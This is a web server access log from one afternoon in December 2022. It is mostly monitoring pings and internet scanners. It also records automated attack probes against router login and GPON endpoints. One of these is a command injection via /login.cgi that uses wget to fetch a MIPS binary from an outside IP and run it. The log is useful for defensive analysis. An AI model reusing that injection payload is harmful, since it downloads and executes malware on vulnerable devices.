141.255.166.2 - - [01/Dec/2022:15:39:06 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Dec/2022:15:39:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.216 - - [01/Dec/2022:15:40:34 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Dec/2022:15:40:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [01/Dec/2022:15:41:39 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Dec/2022:15:41:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:15:42:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:15:43:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:15:44:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.124 - - [01/Dec/2022:15:45:35 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Dec/2022:15:45:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:15:46:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:15:47:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:15:48:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [01/Dec/2022:15:49:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [01/Dec/2022:15:49:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:15:50:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:15:51:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:15:52:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:15:53:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.40 - - [01/Dec/2022:15:54:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.94.92.40 - - [01/Dec/2022:15:54:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Dec/2022:15:54:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.40 - - [01/Dec/2022:15:55:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.33.80.243 - - [01/Dec/2022:15:55:35 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Dec/2022:15:55:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [01/Dec/2022:15:56:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [01/Dec/2022:15:56:53 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [01/Dec/2022:15:56:54 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [01/Dec/2022:15:56:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:15:57:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:15:58:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:15:59:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:00:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.104.11.51 - - [01/Dec/2022:16:01:18 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Dec/2022:16:01:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:02:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:03:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:04:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:05:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:06:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:07:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.79.181.94 - - [01/Dec/2022:16:08:49 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Dec/2022:16:08:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.128.13 - - [01/Dec/2022:16:08:56 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Dec/2022:16:09:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:10:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:11:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.104.11.4 - - [01/Dec/2022:16:12:14 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Dec/2022:16:12:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:13:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.155.90.220 - - [01/Dec/2022:16:14:18 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Dec/2022:16:14:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.21.172.128 - - [01/Dec/2022:16:15:30 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
172.105.128.11 - - [01/Dec/2022:16:15:46 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Dec/2022:16:15:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.33.80.243 - - [01/Dec/2022:16:16:20 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Dec/2022:16:16:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.104.11.34 - - [01/Dec/2022:16:17:48 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Dec/2022:16:17:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:18:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.155.90.220 - - [01/Dec/2022:16:19:28 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Dec/2022:16:19:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:20:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:21:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:22:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.176.108.126 - - [01/Dec/2022:16:23:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Dec/2022:16:23:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.93 - - [01/Dec/2022:16:24:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
212.91.246.72 - - [01/Dec/2022:16:24:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:25:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.216 - - [01/Dec/2022:16:26:35 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
194.55.186.216 - - [01/Dec/2022:16:26:39 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.255.166.2 - - [01/Dec/2022:16:26:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
64.62.197.99 - - [01/Dec/2022:16:26:50 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Edg/106.0.1370.37"
212.91.246.72 - - [01/Dec/2022:16:26:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [01/Dec/2022:16:27:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Dec/2022:16:27:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:28:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [01/Dec/2022:16:29:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Dec/2022:16:29:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:30:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [01/Dec/2022:16:31:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Dec/2022:16:31:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:32:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:33:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [01/Dec/2022:16:34:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Dec/2022:16:34:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [01/Dec/2022:16:35:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Dec/2022:16:35:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:36:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:37:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:38:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:39:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:40:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:41:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:42:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:43:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [01/Dec/2022:16:44:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Dec/2022:16:44:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:45:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.110.163.166 - - [01/Dec/2022:16:46:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Dec/2022:16:46:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:47:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [01/Dec/2022:16:48:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Dec/2022:16:48:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:49:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:50:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:51:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:52:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [01/Dec/2022:16:52:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
162.221.192.26 - - [01/Dec/2022:16:53:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Dec/2022:16:53:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:54:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:55:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:56:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.216 - - [01/Dec/2022:16:57:30 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Dec/2022:16:57:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.91.47.43 - - [01/Dec/2022:16:58:30 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
162.142.125.211 - - [01/Dec/2022:16:58:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.211 - - [01/Dec/2022:16:58:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.211 - - [01/Dec/2022:16:58:33 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.211 - - [01/Dec/2022:16:58:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Dec/2022:16:58:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:16:59:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:00:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [01/Dec/2022:17:01:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Dec/2022:17:01:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.216.213.212 - - [01/Dec/2022:17:02:25 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [01/Dec/2022:17:02:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:03:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:04:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:05:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:06:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.124 - - [01/Dec/2022:17:07:21 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
173.214.175.178 - - [01/Dec/2022:17:07:40 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Dec/2022:17:07:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:08:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:09:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:10:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:11:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:12:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:13:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.124 - - [01/Dec/2022:17:14:12 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Dec/2022:17:14:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.1.248.42 - - [01/Dec/2022:17:15:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Dec/2022:17:15:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.228 - - [01/Dec/2022:17:16:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 OPR/90.0.4480.117"
212.91.246.72 - - [01/Dec/2022:17:16:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:17:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:18:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.234 - - [01/Dec/2022:17:19:19 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
212.91.246.72 - - [01/Dec/2022:17:19:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:20:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:21:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:22:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:23:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:24:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:25:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
